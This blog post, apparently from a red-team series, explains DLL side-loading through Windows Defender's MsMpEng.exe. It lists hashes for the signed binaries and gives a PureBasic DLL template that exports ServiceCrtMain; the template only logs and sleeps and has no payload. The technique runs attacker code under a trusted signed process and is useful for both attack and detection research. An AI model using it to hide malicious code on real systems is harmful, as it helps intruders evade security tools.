DLL Side-Loading for Fun (and Profit?) - Day 4

Posted: - Updated: - Category: security - Tags: side-loading

TL;DR: see Part 1 for an introduction to this series and an overview of the available posts.

My all time favorite side-loading target is Windows Defender, as most of the time the executable (MsMpEng.exe) is already on the system and you only need to place your DLL, with one export (ServiceCrtMain), in the right folder and copy the executable.

  • Name: Microsoft Windows Defender (x64)
  • Executable: MsMpEng.exe
  • SHA256: a72ea60be2adb8f15bbec86910dc1c1f41abe888fb87b1f3f902dcaa85e774f6
  • SHA1: fdb29638944a097d83c8c3442970287a890a0a03
  • MD5: ed70edcc4107f3727973c312e0049bd5

  • Certificate: Microsoft Corporation/Microsoft Code Signing PCA/Microsoft Root Certificate Authority

  • Name: Microsoft Windows Defender (x32)
  • Executable: MsMpEng.exe
  • SHA256: 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a
  • SHA1: 3d409b39b8502fcd23335a878f2cbdaf6d721995
  • MD5: 8cc83221870dd07144e63df594c391d9
  • Certificate: Microsoft Corporation/Microsoft Code Signing PCA/Microsoft Root Certificate Authority

DLL-Template:

; ***************************************************************************
; *                                                                         *
; * Author:      marpie (marpie@a12d404.net)                                *
; * License:     BSD 2-clause                                               *
; * Copyright:   (c) 2019, a12d404.net                                      *
; * Status:      Prototype                                                  *
; * Created:     20190104                                                   *
; * Last Update: 20190104                                                   *
; *                                                                         *
; ***************************************************************************
EnableExplicit

; ---------------------------------------------------------------------------
;- Prototypes
Macro LoopForever()
  Sleep_(-1)
EndMacro

Macro DbgOutFunctionName()
  OutputDebugString_("Func: " + #PB_Compiler_Procedure)
EndMacro

Macro DummyExport(proc_name)
  ProcedureDLL proc_name()
    DbgOutFunctionName()
    LoopForever()
  EndProcedure
EndMacro

; ---------------------------------------------------------------------------
;- Exports: mpsvc.dll - MsMpEng.exe (Microsoft Malware Protection Antimalware Service Executable)

DummyExport(ServiceCrtMain)

; ---------------------------------------------------------------------------

ProcedureDLL AttachProcess(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL DetachProcess(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL AttachThread(Instance)
  DbgOutFunctionName()
EndProcedure

ProcedureDLL DetachThread(Instance)
  DbgOutFunctionName()
EndProcedure

Download: I do not provide the executables in question as they can easily be found on the Internet and I don’t want any eager companies to send me DMCA take-down letters ;-). Hybrid Analysis / reverse.it or VirusTotal are always happy to help with downloads for these files…

A description of all executables will be collected on Github: signed-loaders